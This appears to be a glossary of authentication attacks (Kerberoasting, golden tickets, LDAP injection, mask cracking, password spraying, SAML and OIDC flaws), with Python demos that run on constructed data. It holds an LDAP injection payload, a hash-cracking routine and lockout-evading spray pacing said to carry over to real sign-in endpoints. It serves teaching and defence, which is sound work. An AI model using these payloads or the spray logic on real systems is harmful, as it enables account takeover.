Medusa
Parallel brute-forcer for network logins. Its focus is to support numerous network services that allow remote authentication.
John The Ripper
Highly optimized password cracker. Its community-enhanced "Jumbo" build recognizes and cracks a very large set of hash and cipher formats, and it runs on multiple platforms.
Hashcat
Modern password and hash cracking tool that offers several attack modes (dictionary, mask, hybrid, rule-based) so the candidate list can be shaped to the likely structure of the passwords instead of trying every possible string. Supports GPUs for massively parallel cracking.
MFA Fatigue
occurs when an attacker who already holds one valid factor (typically the password) repeatedly triggers the second factor, flooding the user with push-notification approval prompts until the user approves one just to make them stop.
Pass-the-Token Attack
also known as a pass-the-PRT attack, allows the pentester to move laterally through the organization's cloud infrastructure while bypassing authentication measures such as MFA. This attack targets the primary refresh token (PRT), which plays the role a TGT plays in an Active Directory environment, except that the PRT keeps the user authenticated to the cloud environment, such as Azure AD (Entra ID), and is used to obtain further access tokens without a new MFA prompt.
Kerberoasting
Enumerate user accounts that have Service Principal Names (SPNs); these are the candidates for Kerberoasting. (Computer accounts also have SPNs, but their passwords are long and random, so they are not worth cracking.)
From the list of SPNs, request service tickets (TGS) for interesting targets, such as the account behind a database or web server. Asking for RC4-HMAC (etype 23) where the KDC still allows it yields tickets that crack far faster than AES ones.
Dump the service ticket. Its encrypted part is protected with the service account's Kerberos key, which for RC4-HMAC is simply the NT hash of the account's password.
Crack the ticket offline to recover the account's plaintext password. The KDC never sees the guesses, so there is no lockout and no failed-logon telemetry during this step.
Once the password has been cracked, the pentester can authenticate as the service account and continue taking control of the environment. Kerberoasting is a significant attack because many service accounts are over-privileged (often local or domain admin) and their passwords are seldom changed.
Delegation Attack
If the pentester gains control of an account or computer that has Kerberos delegation enabled (unconstrained, constrained, or resource-based), they can obtain service tickets on behalf of other users, including privileged ones, and use them to access other services on the network.
Golden Ticket Attack
The ultimate goal when pentesting a Kerberos network is to compromise the Key Distribution Center (KDC). If the pentester can steal the hash of the krbtgt account (the Key Distribution Service account that encrypts every TGT), they can forge valid TGTs for any user whenever they want, and those tickets remain valid until the krbtgt password is rotated twice. This forged TGT is known as a golden ticket.
LDAP Injection
the pentester supplies LDAP filter metacharacters (such as *, (, ), | and &) in an input field whose value the application concatenates into an LDAP search filter. If the application does not escape the input before building the filter, the attacker can change the filter's logic, bypass authentication or enumerate directory entries, and gain access to network resources.
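The injection described above, as an added example that is not part of the original page: a login routine that concatenates user input into an LDAP filter next to one that escapes it per RFC 4515, run against a constructed in-memory directory with a tiny filter evaluator. The directory entries, attribute names and passwords are sample data; the evaluator only supports the `&`, `|`, `!` and `attr=value` filter forms needed to show the bypass.

```python
import re

# Constructed sample directory: each entry is a dict of attribute -> value.
DIRECTORY = [
    {"uid": "admin", "userPassword": "S3cret!", "memberOf": "cn=admins"},
    {"uid": "bob", "userPassword": "hunter2", "memberOf": "cn=staff"},
]


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping: filter metacharacters become \\XX so they match literally."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def login_filter_vulnerable(username: str, password: str) -> str:
    return f"(&(uid={username})(userPassword={password}))"


def login_filter_safe(username: str, password: str) -> str:
    return f"(&(uid={escape_filter_value(username)})(userPassword={escape_filter_value(password)}))"


def _parse(s: str, i: int):
    """Recursive-descent parser for (&...), (|...), (!...) and (attr=value) filters."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if s[i] in "&|":
        op, kids, i = s[i], [], i + 1
        while s[i] == "(":
            node, i = _parse(s, i)
            kids.append(node)
        return (op, kids), i + 1                       # skip the closing ')'
    if s[i] == "!":
        node, i = _parse(s, i + 1)
        return ("!", node), i + 1
    eq, close = s.index("=", i), s.index(")", i)      # an unescaped ')' ends the value
    return ("=", s[i:eq], s[eq + 1:close]), close + 1


def _unescape(s: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def _matches(node, entry) -> bool:
    if node[0] == "&":
        return all(_matches(k, entry) for k in node[1])
    if node[0] == "|":
        return any(_matches(k, entry) for k in node[1])
    if node[0] == "!":
        return not _matches(node[1], entry)
    _, attr, pattern = node
    # '*' is a wildcard only when unescaped: split on it first, then unescape each literal run
    rx = "^" + ".*".join(re.escape(_unescape(p)) for p in pattern.split("*")) + "$"
    return re.match(rx, entry.get(attr, "")) is not None


def search(directory, filter_str: str):
    """Return the uids matching the first complete filter. Text after it is ignored,
    which is what the classic '*)(uid=*))(|(uid=*' payload relies on."""
    node, _ = _parse(filter_str, 0)
    return [e["uid"] for e in directory if _matches(node, e)]


def login(username: str, password: str, build=login_filter_vulnerable):
    return search(DIRECTORY, build(username, password))


if __name__ == "__main__":
    for user, pw in [("admin", "S3cret!"), ("admin", "*"), ("*)(uid=*))(|(uid=*", "x")]:
        print(repr(user), repr(pw), "vulnerable:", login(user, pw),
              "safe:", login(user, pw, login_filter_safe))
```

With the vulnerable builder, a password of `*` turns the password clause into a wildcard and logs in as admin, and the username payload rewrites the whole filter to `(&(uid=*)(uid=*))` and returns every account. The escaped builder turns the same inputs into literal strings that match nothing. Escaping the value is the minimum; prefer binding the password via a bind operation rather than comparing userPassword in a search filter at all.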
Mask Attack
a password cracking technique that is similar to a brute-force attack but more systematic and typically much quicker. In a mask attack, the cracker specifies a character set for each position (for example uppercase, then lowercase letters, then digits) and a length, so only candidates that fit the expected password structure are tried instead of every possible string.
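As an added example that is not part of the original page, the following reimplements hashcat-style mask syntax (`?l ?u ?d ?s ?a`, custom sets `?1`..`?4`, `??` for a literal question mark) to show how much a mask shrinks the keyspace and to crack a constructed unsalted SHA-256 hash with a policy-shaped mask. The target password, the masks and the custom-set definitions are sample data; hashcat itself walks the keyspace in a different order and on a GPU.

```python
import hashlib
import itertools
import string

# hashcat's built-in charsets: ?l ?u ?d ?s and ?a (= ?l?u?d?s, the 95 printable ASCII chars)
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def parse_mask(mask: str, custom=None):
    """Turn a mask into one character set per position. Custom sets '?1'..'?4' come from
    `custom`, whose values are themselves masks (like hashcat -1 '?l?d'); '??' is a literal '?'."""
    custom = {k: "".join(parse_mask(v)) for k, v in (custom or {}).items()}
    sets, i = [], 0
    while i < len(mask):
        if mask[i] == "?":
            key = mask[i + 1]
            sets.append("?" if key == "?" else custom.get(key) or BUILTIN[key])
            i += 2
        else:
            sets.append(mask[i])          # a literal character is a one-element set
            i += 1
    return sets


def keyspace(mask: str, custom=None) -> int:
    n = 1
    for s in parse_mask(mask, custom):
        n *= len(s)
    return n


def candidates(mask: str, custom=None):
    for combo in itertools.product(*parse_mask(mask, custom)):
        yield "".join(combo)


def crack_sha256(target_hex: str, mask: str, custom=None):
    """Walk the mask's keyspace and stop at the first candidate whose SHA-256 matches."""
    for cand in candidates(mask, custom):
        if hashlib.sha256(cand.encode()).hexdigest() == target_hex:
            return cand
    return None


# Constructed sample: unsalted SHA-256 of a short password shaped like "Ulddd" policy output.
TARGET = hashlib.sha256(b"Tx47").hexdigest()

if __name__ == "__main__":
    print("8 printable chars, full brute force:", keyspace("?a" * 8))
    print("policy-shaped mask ?u?l?l?l?l?d?d?d:", keyspace("?u?l?l?l?l?d?d?d"))
    print("custom set -1 ?l?d, mask ?1?1?1?1?1?1:", keyspace("?1" * 6, {"1": "?l?d"}))
    print("cracked:", crack_sha256(TARGET, "?u?l?d?d"))
```

The numbers are the whole point: eight arbitrary printable characters is 95^8 (about 6.6e15) candidates, while "one capital, four lowercase, three digits" is 26^5 * 10^3 (about 1.2e10), roughly half a million times smaller, and that is the shape most complexity policies push users toward. The flip side is that a mask that does not match the password's structure (the lowercase-only mask in the test) never finds it, which is why hybrid and rule-based modes exist.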
Password Spraying
a type of brute-force attack that inverts the usual approach: instead of trying many passwords against one account, the pentester tries one password (or a few very common ones) against many usernames. Each account sees only a single attempt per round, so the attack stays below account-lockout thresholds that would stop a conventional brute force. This attack works well in environments where users are given a default or seasonal initial password and are relied upon to change it.
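As an added example that is not part of the original page, the following simulates a directory with an AD-style lockout policy (threshold plus observation window) and runs both a per-account brute force and a lockout-aware spray against it. The accounts, passwords, the policy values and the simulated clock are constructed; the point is the pacing logic, which is the same whether the real target is LDAP, OWA, a VPN portal or a cloud sign-in endpoint.

```python
from dataclasses import dataclass


@dataclass
class LockoutPolicy:
    threshold: int = 5        # bad attempts that lock the account
    window_minutes: int = 30  # bad attempts older than this no longer count


class FakeDirectory:
    """Constructed stand-in for a domain's authentication endpoint with lockout enforcement."""

    def __init__(self, creds: dict, policy: LockoutPolicy):
        self.creds, self.policy = creds, policy
        self.failures = {u: [] for u in creds}   # timestamps of recent bad attempts per user
        self.locked = set()
        self.now = 0.0                            # simulated clock, in minutes

    def advance(self, minutes: float):
        self.now += minutes

    def authenticate(self, user: str, password: str) -> str:
        if user not in self.creds:
            return "unknown"
        if user in self.locked:
            return "locked"
        if self.creds[user] == password:
            return "success"
        recent = [t for t in self.failures[user] if self.now - t < self.policy.window_minutes]
        recent.append(self.now)
        self.failures[user] = recent
        if len(recent) >= self.policy.threshold:
            self.locked.add(user)
            return "locked"
        return "failure"


def brute_force_one_user(directory: FakeDirectory, user: str, passwords):
    """Many passwords against one account: trips the lockout after `threshold` misses."""
    for password in passwords:
        result = directory.authenticate(user, password)
        if result in ("success", "locked"):
            return result, password
    return "exhausted", None


def spray(directory: FakeDirectory, users, passwords):
    """One password against every account per round; wait a full observation window
    before any account would reach the lockout threshold, so earlier misses age out."""
    hits, tries_in_window = {}, 0
    for password in passwords:
        if tries_in_window + 1 >= directory.policy.threshold:
            directory.advance(directory.policy.window_minutes)
            tries_in_window = 0
        for user in users:
            if directory.authenticate(user, password) == "success":
                hits[user] = password
        tries_in_window += 1
    return hits


def make_directory() -> FakeDirectory:
    """Constructed sample: a few accounts, two of which still use seasonal/default passwords."""
    creds = {"alice": "Welcome1", "bob": "Spring2024!", "carol": "c4r0l-R4nd0m-9!",
             "dave": "d4v3-R4nd0m-2!", "svc_backup": "b4ckup-R4nd0m-7!"}
    return FakeDirectory(creds, LockoutPolicy())


PASSWORDS = ["Password1", "Welcome1", "Spring2024!", "Company123", "Summer2024!", "Changeme1"]

if __name__ == "__main__":
    d = make_directory()
    print("spray hits:", spray(d, list(d.creds), PASSWORDS), "locked:", sorted(d.locked))
    print("brute force on carol:", brute_force_one_user(make_directory(), "carol", PASSWORDS))
```

The brute force locks carol on the fifth miss without ever reaching a valid guess, which is noisy and denies service to a real user. The spray finds the two weak accounts with four tries per account per window and locks nobody. On the defensive side this is why the signal to alert on is many distinct usernames failing from one source in a short interval, not the per-account bad-password counter that lockout already watches.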
Credential Stuffing
type of brute-force attack in which an attacker obtains users' login credentials from one organization (typically from a published breach dump) and tries those same credentials on another site or app. The hope is that the user has an account with the second site and is reusing the same username and password.
OpenID Connect (OIDC) Attack
OIDC implementations can be subject to several vulnerabilities, including:
Cross-Site Request Forgery (CSRF), for example when the state parameter is missing or not validated
Server-Side Request Forgery (SSRF)
Impersonating a user by stealing a valid token
SAML Attack
If the SAML exchange is not properly implemented and validated by the service provider, it can be exploited to gain unauthorized access to resources. Some potential attacks include:
XML Signature Wrapping - The signed XML document is restructured so that a malicious assertion is the one the application processes, while the original, validly signed element is still present to satisfy signature verification.
Assertion Tampering - The assertion statements are intercepted and altered, changing the attributes (such as the user identifier or group claims) or authorization data.
On-Path and Replay attacks - If the attacker can intercept a legitimate SAML assertion, they can replay it to gain unauthorized access unless the service provider enforces the assertion's validity window, audience and one-time use of its ID.